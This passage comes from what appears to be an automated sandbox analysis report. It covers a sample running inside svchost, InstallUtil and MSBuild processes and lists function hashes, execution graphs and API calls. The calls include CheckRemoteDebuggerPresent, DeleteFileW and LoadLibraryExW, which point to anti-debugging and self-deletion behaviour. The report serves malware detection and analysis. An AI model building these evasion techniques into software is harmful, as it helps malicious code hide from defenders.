                                                                          • Opcode Fuzzy Hash: 69c462d13083fb14242d3baa2a2989662032da44aea96315fd0228cc75da8a4d
                                                                          • Instruction Fuzzy Hash: 43314774A0871C8FEB58DF98D889BEDB7F0FB19311F10416AD00AE7252DB74A986CB50
                                                                          Function 00007FFD9B970E29 Relevance: 1.0, Instructions: 965COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1972138673.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b970000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c8890e8c0b674af97a38318c3cdb423636b07536566b0870ade05e86a9788f76
                                                                          • Instruction ID: 1c6b627dbdab4dae97c32f94490dd1dcdcc8e5c7f6a49c2054bacabe74038651
                                                                          • Opcode Fuzzy Hash: c8890e8c0b674af97a38318c3cdb423636b07536566b0870ade05e86a9788f76
                                                                          • Instruction Fuzzy Hash: 50524A31A1F7D95FD766DB6888A55A47FE0EF56304B0A02FFD4C9CB0A3DA14A906C381
                                                                          Function 00007FFD9B971269 Relevance: .2, Instructions: 233COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.1972138673.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ffd9b970000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f479dfa262346e44a5e99cca58182ae8353678a5d480ddf3a3a955f4abfef33a
                                                                          • Instruction ID: 8e02854ff1f5156515157645e79671cf57781c21fa8b63dddbfa08aed4e92d89
                                                                          • Opcode Fuzzy Hash: f479dfa262346e44a5e99cca58182ae8353678a5d480ddf3a3a955f4abfef33a
                                                                          • Instruction Fuzzy Hash: BC61383061EBD95FD76ADB6888B59A47FF0EF5630470A01EAD08AC71A3DA18A906C341

                                                                          Execution Graph

                                                                          Execution Coverage:12.1%
                                                                          Dynamic/Decrypted Code Coverage:80%
                                                                          Signature Coverage:12%
                                                                          Total number of Nodes:25
                                                                          Total number of Limit Nodes:4
                                                                          execution_graph 25454 10a0848 25455 10a084e 25454->25455 25456 10a091b 25455->25456 25459 10a137f 25455->25459 25465 10a14c0 25455->25465 25460 10a1383 25459->25460 25462 10a1310 25459->25462 25461 10a14ba 25460->25461 25464 10a14c0 DeleteFileW 25460->25464 25470 10ab6ff 25460->25470 25461->25455 25462->25455 25464->25460 25466 10a1396 25465->25466 25467 10a14ba 25465->25467 25466->25467 25468 10a14c0 DeleteFileW 25466->25468 25469 10ab6ff DeleteFileW 25466->25469 25467->25455 25468->25466 25469->25466 25471 10ab69b DeleteFileW 25470->25471 25474 10ab70f 25470->25474 25473 10ab6cf 25471->25473 25473->25460 25474->25460 25475 66bfde2 25479 66bfc71 25475->25479 25476 66bfe0b 25477 66bfe78 LoadLibraryExW 25478 66bfea9 25477->25478 25479->25476 25479->25477 25480 10a7ee0 25481 10a7f24 CheckRemoteDebuggerPresent 25480->25481 25482 10a7f66 25481->25482

                                                                          Executed Functions

                                                                          Function 066BF7D8 Relevance: 2.0, APIs: 1, Instructions: 538COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1928 66bf7d8-66bf7f8 1929 66bf7fa-66bf7fd 1928->1929 1930 66bf80f-66bf812 1929->1930 1931 66bf7ff-66bf80a 1929->1931 1932 66bf824-66bf827 1930->1932 1933 66bf814-66bf81d 1930->1933 1931->1930 1936 66bf829-66bf84d 1932->1936 1937 66bf852-66bf855 1932->1937 1934 66bf81f 1933->1934 1935 66bf883-66bf88c 1933->1935 1934->1932 1939 66bf892-66bf899 1935->1939 1940 66bfb75-66bfbad 1935->1940 1936->1937 1941 66bf85b-66bf85e 1937->1941 1942 66bf910-66bf919 1937->1942 1943 66bf89e-66bf8a1 1939->1943 1955 66bfbaf-66bfbb2 1940->1955 1947 66bf87e-66bf881 1941->1947 1948 66bf860-66bf879 1941->1948 1944 66bf9df-66bf9e8 1942->1944 1945 66bf91f 1942->1945 1951 66bf8cd-66bf8d0 1943->1951 1952 66bf8a3-66bf8c8 1943->1952 1944->1940 1949 66bf9ee-66bf9f5 1944->1949 1953 66bf924-66bf927 1945->1953 1947->1935 1947->1943 1948->1947 1954 66bf9fa-66bf9fd 1949->1954 1959 66bf8d2-66bf8ec 1951->1959 1960 66bf8f1-66bf8f4 1951->1960 1952->1951 1956 66bf929-66bf938 1953->1956 1957 66bf943-66bf946 1953->1957 1962 66bf9ff-66bfa1b 1954->1962 1963 66bfa20-66bfa23 1954->1963 1964 66bfbd5-66bfbd8 1955->1964 1965 66bfbb4-66bfbd0 1955->1965 1989 66bf93e 1956->1989 1990 66bfb50-66bfb53 1956->1990 1967 66bf948-66bf962 1957->1967 1968 66bf967-66bf96a 1957->1968 1959->1960 1969 66bf8fe-66bf901 1960->1969 1970 66bf8f6-66bf8f9 1960->1970 1962->1963 1973 66bfa4e-66bfa51 1963->1973 1974 66bfa25-66bfa49 1963->1974 1976 66bfbda-66bfbe8 1964->1976 1977 66bfbef-66bfbf2 1964->1977 1965->1964 1967->1968 1980 66bf96c-66bf971 1968->1980 1981 66bf974-66bf977 1968->1981 1971 66bf90b-66bf90e 1969->1971 1972 66bf903-66bf908 1969->1972 1970->1969 1971->1942 1971->1953 1972->1971 1982 66bfa5e-66bfa61 1973->1982 1983 66bfa53-66bfa59 1973->1983 1974->1973 1995 66bfc04-66bfc1d 1976->1995 2015 66bfbea 1976->2015 1992 66bfbff-66bfc02 1977->1992 1993 66bfbf4-66bfbfe 1977->1993 1980->1981 1984 66bf979-66bf98a 1981->1984 1985 66bf98f-66bf992 1981->1985 1996 66bfa6e-66bfa71 1982->1996 1997 66bfa63-66bfa69 1982->1997 1983->1982 1984->1985 1998 66bf9b3-66bf9b6 1985->1998 1999 66bf994-66bf9ae 1985->1999 1989->1957 2000 66bfb58-66bfb5a 1990->2000 1994 66bfc2a-66bfc2d 1992->1994 1992->1995 2006 66bfc2f-66bfc48 1994->2006 2007 66bfc4d-66bfc4f 1994->2007 2029 66bfc5f-66bfc6b 1995->2029 2040 66bfc1f-66bfc29 1995->2040 2004 66bfa73-66bfa77 1996->2004 2005 66bfa82-66bfa85 1996->2005 1997->1996 2008 66bf9b8-66bf9c8 1998->2008 2009 66bf9cd-66bf9d0 1998->2009 1999->1998 2011 66bfb5c 2000->2011 2012 66bfb61-66bfb64 2000->2012 2017 66bfa7d 2004->2017 2018 66bf9d2-66bf9d5 2004->2018 2019 66bfae7-66bfaea 2005->2019 2020 66bfa87-66bfae2 2005->2020 2006->2007 2023 66bfc51 2007->2023 2024 66bfc56-66bfc59 2007->2024 2008->2009 2009->2018 2025 66bf9da-66bf9dd 2009->2025 2011->2012 2012->1929 2022 66bfb6a-66bfb74 2012->2022 2015->1977 2017->2005 2018->2025 2030 66bfaec-66bfb0e 2019->2030 2031 66bfb13-66bfb16 2019->2031 2020->2019 2023->2024 2024->1955 2024->2029 2025->1944 2025->1954 2034 66bfe0b-66bfe15 2029->2034 2035 66bfc71-66bfc7a 2029->2035 2030->2031 2031->1933 2037 66bfb1c-66bfb1f 2031->2037 2042 66bfc80-66bfca0 2035->2042 2043 66bfe16-66bfe70 2035->2043 2038 66bfb4b-66bfb4e 2037->2038 2039 66bfb21-66bfb46 2037->2039 2038->1990 2038->2000 2039->2038 2059 66bfdf9-66bfe05 2042->2059 2060 66bfca6-66bfcaf 2042->2060 2050 66bfe78-66bfea7 LoadLibraryExW 2043->2050 2051 66bfe72-66bfe75 2043->2051 2054 66bfea9-66bfeaf 2050->2054 2055 66bfeb0-66bfecd 2050->2055 2051->2050 2054->2055 2059->2034 2059->2035 2060->2043 2064 66bfcb5-66bfce4 call 66b9bf8 2060->2064 2072 66bfd26-66bfd3c 2064->2072 2073 66bfce6-66bfd1e 2064->2073 2076 66bfd5a-66bfd70 2072->2076 2077 66bfd3e-66bfd52 2072->2077 2073->2072 2082 66bfd8e-66bfda1 2076->2082 2083 66bfd72-66bfd86 2076->2083 2077->2076 2086 66bfdaf 2082->2086 2087 66bfda3-66bfdad 2082->2087 2083->2082 2088 66bfdb4-66bfdb6 2086->2088 2087->2088 2089 66bfdb8-66bfdbd 2088->2089 2090 66bfde7-66bfdf3 2088->2090 2091 66bfdcb 2089->2091 2092 66bfdbf-66bfdc9 2089->2092 2090->2059 2090->2060 2093 66bfdd0-66bfdd2 2091->2093 2092->2093 2093->2090 2094 66bfdd4-66bfde0 2093->2094 2094->2090
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2930382102.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_66b0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0723b451c9175eb2c81d1b1de37551f633482b98c8e0b4b081202e372767056c
                                                                          • Instruction ID: 31bb10d277fe66476f442c9f491ad1f4375d287575a3e1c9430ac0afc5cbd026
                                                                          • Opcode Fuzzy Hash: 0723b451c9175eb2c81d1b1de37551f633482b98c8e0b4b081202e372767056c
                                                                          • Instruction Fuzzy Hash: 8F12A234E00209DFDF64DF69D980BAEB7B2EB88314F109529E419E7365C735E886CB91
                                                                          Function 010A7EE0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2282 10a7ee0-10a7f64 CheckRemoteDebuggerPresent 2284 10a7f6d-10a7fa8 2282->2284 2285 10a7f66-10a7f6c 2282->2285 2285->2284
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 010A7F57
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 8c5f57235d5290fe818f06a0d6c7d16407faef762727504e96dd257f507f59c2
                                                                          • Instruction ID: 866f4794a5d0f3f500848afce961d0fba222289c3fbf5cc14b4f709dc9871a6e
                                                                          • Opcode Fuzzy Hash: 8c5f57235d5290fe818f06a0d6c7d16407faef762727504e96dd257f507f59c2
                                                                          • Instruction Fuzzy Hash: 252145B1800259CFCB10CF9AD484BEEBBF4AF49320F14846AE458A3250D738AA44CF64
                                                                          Function 010AB6FF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 934 10ab6ff-10ab70d 935 10ab69b-10ab6cd DeleteFileW 934->935 936 10ab70f-10ab724 934->936 939 10ab6cf-10ab6d5 935->939 940 10ab6d6-10ab6fe 935->940 938 10ab726-10ab729 936->938 941 10ab72b-10ab760 938->941 942 10ab765-10ab768 938->942 939->940 941->942 943 10ab76a-10ab77e 942->943 944 10ab79b-10ab79e 942->944 958 10ab780-10ab782 943->958 959 10ab784 943->959 947 10ab7b2-10ab7b5 944->947 948 10ab7a0-10ab7a7 944->948 951 10ab7b7 call 10abcb0 947->951 952 10ab7c5-10ab7c7 947->952 949 10ab7ad 948->949 950 10ab883-10ab88a 948->950 949->947 954 10ab899-10ab89f 950->954 955 10ab88c 950->955 960 10ab7bd-10ab7c0 951->960 956 10ab7c9 952->956 957 10ab7ce-10ab7d1 952->957 963 10ab892 955->963 956->957 957->938 961 10ab7d7-10ab7e6 957->961 962 10ab787-10ab796 958->962 959->962 960->952 966 10ab7e8-10ab7eb 961->966 967 10ab810-10ab825 961->967 962->944 963->954 969 10ab7f3-10ab80e 966->969 967->950 969->966 969->967
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010AB6C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID: LR^q
                                                                          • API String ID: 4033686569-2625958711
                                                                          • Opcode ID: 7d9307bd292b8521d4936315d9aba6bbfbce14239df40c62ed9f60a1ced3c8c3
                                                                          • Instruction ID: 02740b30c117ebf5ae83fe013d088cc0a8904c4a178f785ae3372db2f0be6ee7
                                                                          • Opcode Fuzzy Hash: 7d9307bd292b8521d4936315d9aba6bbfbce14239df40c62ed9f60a1ced3c8c3
                                                                          • Instruction Fuzzy Hash: 3A41CF30E006198FDB65CFA8C4447EEBBF1FF49310F548959E886EB251E7B4A942CB90
                                                                          Function 010A7ED8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2276 10a7ed8-10a7f64 CheckRemoteDebuggerPresent 2278 10a7f6d-10a7fa8 2276->2278 2279 10a7f66-10a7f6c 2276->2279 2279->2278
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 010A7F57
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 2f6c6f5f0242c6c6b65b7e59e809244b6b56820a621fe61fd1d911e23b66ca6e
                                                                          • Instruction ID: 2ebee09c1d686e565e1aaca785034c94cb7fa2bf0e247682b41cb6f9725fc7fa
                                                                          • Opcode Fuzzy Hash: 2f6c6f5f0242c6c6b65b7e59e809244b6b56820a621fe61fd1d911e23b66ca6e
                                                                          • Instruction Fuzzy Hash: C72148B1C01259CFCB14CFAAD484BEEBBF4EF49320F24846AE459A3251D738A944CF64
                                                                          Function 010AB648 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2288 10ab648-10ab69a 2290 10ab69c-10ab69f 2288->2290 2291 10ab6a2-10ab6cd DeleteFileW 2288->2291 2290->2291 2292 10ab6cf-10ab6d5 2291->2292 2293 10ab6d6-10ab6fe 2291->2293 2292->2293
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010AB6C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: 5ba89544c8a84bd8acf9879c8aaf2b91363ff63876e1c5fb2161672811acbbd6
                                                                          • Instruction ID: cc1fb15c7c92460c9745d4a9a3b5253cd43e67c13b3be621e040867a57e80fca
                                                                          • Opcode Fuzzy Hash: 5ba89544c8a84bd8acf9879c8aaf2b91363ff63876e1c5fb2161672811acbbd6
                                                                          • Instruction Fuzzy Hash: DF2136B1D006598FDB14CF9AD5447EEFBF0BF48320F14816AD858A7250D738A940CFA5
                                                                          Function 010AB650 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DeleteFileW.KERNELBASE(00000000), ref: 010AB6C0
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2875170138.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_10a0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          • Opcode ID: b4af220e793b9a456f3c9375437f740e3972ec32b7b5c470e1a991c6369ecee2
                                                                          • Instruction ID: 3acaba1da30b885fd9ed24783c635d414b47064a2f4fd9ac35cff8625cec1d3d
                                                                          • Opcode Fuzzy Hash: b4af220e793b9a456f3c9375437f740e3972ec32b7b5c470e1a991c6369ecee2
                                                                          • Instruction Fuzzy Hash: 101133B1D0061A9BCB14CF9AC544B9EFBF4FF48320F10816AD858A7250D738A940CFA5
                                                                          Function 00D5D005 Relevance: .1, Instructions: 84COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2870471873.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_d5d000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 917d9fda79aea05038528857c9647f5e1f931535f198d8df651be8de1a3ae0de
                                                                          • Instruction ID: 799acf0d80a69352c0ded79a97b80837701f5a9e51876daf637f7580cb70113d
                                                                          • Opcode Fuzzy Hash: 917d9fda79aea05038528857c9647f5e1f931535f198d8df651be8de1a3ae0de
                                                                          • Instruction Fuzzy Hash: EA311A7550E3C08FDB138B24C9A4711BF71AB47214F1985DBD8898F2A7C22A980ECB72
                                                                          Function 00D5D044 Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.2870471873.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_d5d000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dcc1cee6433e21c30ab9b3d4fc4fa6f38543be9753cb15a96bccd28095cb3dbd
                                                                          • Instruction ID: d274a194506bb3bb8cb8482f78b1bec27d1d53b2ea52c6ec78da0c962e71a664
                                                                          • Opcode Fuzzy Hash: dcc1cee6433e21c30ab9b3d4fc4fa6f38543be9753cb15a96bccd28095cb3dbd
                                                                          • Instruction Fuzzy Hash: 4121F271504204DFCF24DF28C9C4B26BBA6FB84315F24C569EC494B292C73AD84ACA71

                                                                          Execution Graph

                                                                          Execution Coverage:13.1%
                                                                          Dynamic/Decrypted Code Coverage:83.1%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:89
                                                                          Total number of Limit Nodes:10
                                                                          execution_graph 29001 f37ee0 29002 f37f24 CheckRemoteDebuggerPresent 29001->29002 29003 f37f66 29002->29003 29004 f30848 29005 f3084e 29004->29005 29006 f3091b 29005->29006 29008 f3137f 29005->29008 29010 f31383 29008->29010 29009 f314ba 29009->29005 29010->29009 29018 f3b4e2 29010->29018 29023 f3b368 29010->29023 29028 f3b541 29010->29028 29033 f3b4a4 29010->29033 29038 f3b378 29010->29038 29043 f3b6ff 29010->29043 29048 f3b710 29010->29048 29020 f3b4e7 29018->29020 29019 f3b5d3 29019->29010 29053 f3b5f0 29020->29053 29057 f3b5e0 29020->29057 29025 f3b378 29023->29025 29024 f3b5d3 29024->29010 29025->29024 29026 f3b5f0 DeleteFileW 29025->29026 29027 f3b5e0 DeleteFileW 29025->29027 29026->29024 29027->29024 29030 f3b546 29028->29030 29029 f3b5d3 29029->29010 29031 f3b5f0 DeleteFileW 29030->29031 29032 f3b5e0 DeleteFileW 29030->29032 29031->29029 29032->29029 29035 f3b4a9 29033->29035 29034 f3b5d3 29034->29010 29036 f3b5f0 DeleteFileW 29035->29036 29037 f3b5e0 DeleteFileW 29035->29037 29036->29034 29037->29034 29040 f3b391 29038->29040 29039 f3b5d3 29039->29010 29040->29039 29041 f3b5f0 DeleteFileW 29040->29041 29042 f3b5e0 DeleteFileW 29040->29042 29041->29039 29042->29039 29044 f3b70f 29043->29044 29045 f3b7d7 29044->29045 29065 f3c0c8 29044->29065 29071 f3c0b8 29044->29071 29045->29010 29049 f3b726 29048->29049 29050 f3b7d7 29049->29050 29051 f3c0c8 3 API calls 29049->29051 29052 f3c0b8 3 API calls 29049->29052 29050->29010 29051->29049 29052->29049 29054 f3b600 29053->29054 29055 f3b632 29054->29055 29061 f3ae6c 29054->29061 29055->29019 29058 f3b600 29057->29058 29059 f3b632 29058->29059 29060 f3ae6c DeleteFileW 29058->29060 29059->29019 29060->29059 29062 f3b650 DeleteFileW 29061->29062 29064 f3b6cf 29062->29064 29064->29055 29066 f3c0d1 29065->29066 29067 f3c895 29066->29067 29077 f3d9b3 29066->29077 29083 f3d910 29066->29083 29089 f3d901 29066->29089 29067->29044 29072 f3c0bb 29071->29072 29073 f3c895 29072->29073 29074 f3d9b3 3 API calls 29072->29074 29075 f3d901 3 API calls 29072->29075 29076 f3d910 3 API calls 29072->29076 29073->29044 29074->29072 29075->29072 29076->29072 29079 f3d988 29077->29079 29078 f3d9c9 29079->29078 29095 66bf7c8 29079->29095 29100 66bf7d8 29079->29100 29105 66bfb80 29079->29105 29085 f3d92d 29083->29085 29084 f3d9c9 29085->29084 29086 66bf7c8 LoadLibraryExW 29085->29086 29087 66bfb80 LoadLibraryExW 29085->29087 29088 66bf7d8 LoadLibraryExW 29085->29088 29086->29085 29087->29085 29088->29085 29091 f3d92d 29089->29091 29090 f3d9c9 29091->29090 29092 66bf7c8 LoadLibraryExW 29091->29092 29093 66bfb80 LoadLibraryExW 29091->29093 29094 66bf7d8 LoadLibraryExW 29091->29094 29092->29091 29093->29091 29094->29091 29099 66bf7d5 29095->29099 29096 66bfb6a 29096->29079 29097 66bfe78 LoadLibraryExW 29098 66bfea9 29097->29098 29098->29079 29099->29096 29099->29097 29104 66bf7fa 29100->29104 29101 66bfb6a 29101->29079 29102 66bfe78 LoadLibraryExW 29103 66bfea9 29102->29103 29103->29079 29104->29101 29104->29102 29109 66bfbaf 29105->29109 29106 66bfbf4 29106->29079 29107 66bfe78 LoadLibraryExW 29108 66bfea9 29107->29108 29108->29079 29109->29106 29109->29107

                                                                          Executed Functions

                                                                          Function 066BF7D8 Relevance: 2.0, APIs: 1, Instructions: 538COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2416 66bf7d8-66bf7f8 2417 66bf7fa-66bf7fd 2416->2417 2418 66bf80f-66bf812 2417->2418 2419 66bf7ff-66bf80a 2417->2419 2420 66bf824-66bf827 2418->2420 2421 66bf814-66bf81d 2418->2421 2419->2418 2425 66bf829 2420->2425 2426 66bf852-66bf855 2420->2426 2423 66bf81f 2421->2423 2424 66bf883-66bf88c 2421->2424 2423->2420 2427 66bf892-66bf899 2424->2427 2428 66bfb75-66bfbad 2424->2428 2434 66bf833-66bf84d 2425->2434 2429 66bf85b-66bf85e 2426->2429 2430 66bf910-66bf919 2426->2430 2431 66bf89e-66bf8a1 2427->2431 2443 66bfbaf-66bfbb2 2428->2443 2435 66bf87e-66bf881 2429->2435 2436 66bf860-66bf879 2429->2436 2432 66bf9df-66bf9e8 2430->2432 2433 66bf91f 2430->2433 2439 66bf8cd-66bf8d0 2431->2439 2440 66bf8a3-66bf8c8 2431->2440 2432->2428 2438 66bf9ee-66bf9f5 2432->2438 2441 66bf924-66bf927 2433->2441 2434->2426 2435->2424 2435->2431 2436->2435 2444 66bf9fa-66bf9fd 2438->2444 2448 66bf8d2-66bf8ec 2439->2448 2449 66bf8f1-66bf8f4 2439->2449 2440->2439 2445 66bf929-66bf938 2441->2445 2446 66bf943-66bf946 2441->2446 2452 66bfbd5-66bfbd8 2443->2452 2453 66bfbb4-66bfbd0 2443->2453 2454 66bf9ff-66bfa1b 2444->2454 2455 66bfa20-66bfa23 2444->2455 2472 66bf93e 2445->2472 2473 66bfb50-66bfb53 2445->2473 2457 66bf948-66bf962 2446->2457 2458 66bf967-66bf96a 2446->2458 2448->2449 2450 66bf8fe-66bf901 2449->2450 2451 66bf8f6-66bf8f9 2449->2451 2461 66bf90b-66bf90e 2450->2461 2462 66bf903-66bf908 2450->2462 2451->2450 2463 66bfbda-66bfbe8 2452->2463 2464 66bfbef-66bfbf2 2452->2464 2453->2452 2454->2455 2465 66bfa4e-66bfa51 2455->2465 2466 66bfa25-66bfa49 2455->2466 2457->2458 2459 66bf96c-66bf971 2458->2459 2460 66bf974-66bf977 2458->2460 2459->2460 2479 66bf979-66bf98a 2460->2479 2480 66bf98f-66bf992 2460->2480 2461->2430 2461->2441 2462->2461 2485 66bfc04-66bfc1d 2463->2485 2493 66bfbea 2463->2493 2474 66bfbff-66bfc02 2464->2474 2475 66bfbf4-66bfbfe 2464->2475 2477 66bfa5e-66bfa61 2465->2477 2478 66bfa53-66bfa59 2465->2478 2466->2465 2472->2446 2490 66bfb58-66bfb5a 2473->2490 2484 66bfc2a-66bfc2d 2474->2484 2474->2485 2486 66bfa6e-66bfa71 2477->2486 2487 66bfa63-66bfa69 2477->2487 2478->2477 2479->2480 2488 66bf9b3-66bf9b6 2480->2488 2489 66bf994-66bf9ae 2480->2489 2495 66bfc2f 2484->2495 2496 66bfc4d-66bfc4f 2484->2496 2519 66bfc5f-66bfc6b 2485->2519 2531 66bfc1f-66bfc29 2485->2531 2497 66bfa73-66bfa77 2486->2497 2498 66bfa82-66bfa85 2486->2498 2487->2486 2499 66bf9b8-66bf9c8 2488->2499 2500 66bf9cd-66bf9d0 2488->2500 2489->2488 2502 66bfb5c 2490->2502 2503 66bfb61-66bfb64 2490->2503 2493->2464 2517 66bfc39-66bfc48 2495->2517 2511 66bfc51 2496->2511 2512 66bfc56-66bfc59 2496->2512 2506 66bfa7d 2497->2506 2507 66bf9d2-66bf9d5 2497->2507 2508 66bfae7-66bfaea 2498->2508 2509 66bfa87-66bfae2 2498->2509 2499->2500 2500->2507 2514 66bf9da-66bf9dd 2500->2514 2502->2503 2503->2417 2513 66bfb6a-66bfb74 2503->2513 2506->2498 2507->2514 2515 66bfaec-66bfb0e 2508->2515 2516 66bfb13-66bfb16 2508->2516 2509->2508 2511->2512 2512->2443 2512->2519 2514->2432 2514->2444 2515->2516 2516->2421 2521 66bfb1c-66bfb1f 2516->2521 2517->2496 2524 66bfe0b-66bfe15 2519->2524 2525 66bfc71-66bfc7a 2519->2525 2529 66bfb4b-66bfb4e 2521->2529 2530 66bfb21-66bfb46 2521->2530 2526 66bfc80-66bfca0 2525->2526 2527 66bfe16-66bfe70 2525->2527 2547 66bfdf9-66bfe05 2526->2547 2548 66bfca6-66bfcaf 2526->2548 2538 66bfe78-66bfea7 LoadLibraryExW 2527->2538 2539 66bfe72-66bfe75 2527->2539 2529->2473 2529->2490 2530->2529 2544 66bfea9-66bfeaf 2538->2544 2545 66bfeb0-66bfecd 2538->2545 2539->2538 2544->2545 2547->2524 2547->2525 2548->2527 2549 66bfcb5-66bfce4 call 66b9bf8 2548->2549 2560 66bfd26-66bfd3c 2549->2560 2561 66bfce6-66bfd1e 2549->2561 2564 66bfd5a-66bfd70 2560->2564 2565 66bfd3e-66bfd52 2560->2565 2561->2560 2570 66bfd8e-66bfda1 2564->2570 2571 66bfd72-66bfd86 2564->2571 2565->2564 2574 66bfdaf 2570->2574 2575 66bfda3-66bfdad 2570->2575 2571->2570 2576 66bfdb4-66bfdb6 2574->2576 2575->2576 2577 66bfdb8-66bfdbd 2576->2577 2578 66bfde7-66bfdf3 2576->2578 2579 66bfdcb 2577->2579 2580 66bfdbf-66bfdc9 2577->2580 2578->2547 2578->2548 2581 66bfdd0-66bfdd2 2579->2581 2580->2581 2581->2578 2582 66bfdd4-66bfde0 2581->2582 2582->2578
                                                                          Memory Dump Source
                                                                          • Source File: 0000001A.00000002.2937218045.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_26_2_66b0000_MSBuild.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5bf7fc2a4c7236199340c17786e3be355f80735fe8de9ea6f9e406844dfe8897
                                                                          • Instruction ID: e3f158b0632a2dd14a0d48c4f90fe35e918219447acd7a0d7a4e814bbe890fe0
                                                                          • Opcode Fuzzy Hash: 5bf7fc2a4c7236199340c17786e3be355f80735fe8de9ea6f9e406844dfe8897
                                                                          • Instruction Fuzzy Hash: 93129F35A00209DFDF54DF68D890BEEB7B2EB88310F109529E415EB365DB35E886CB91
                                                                          Function 00F37ED8 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
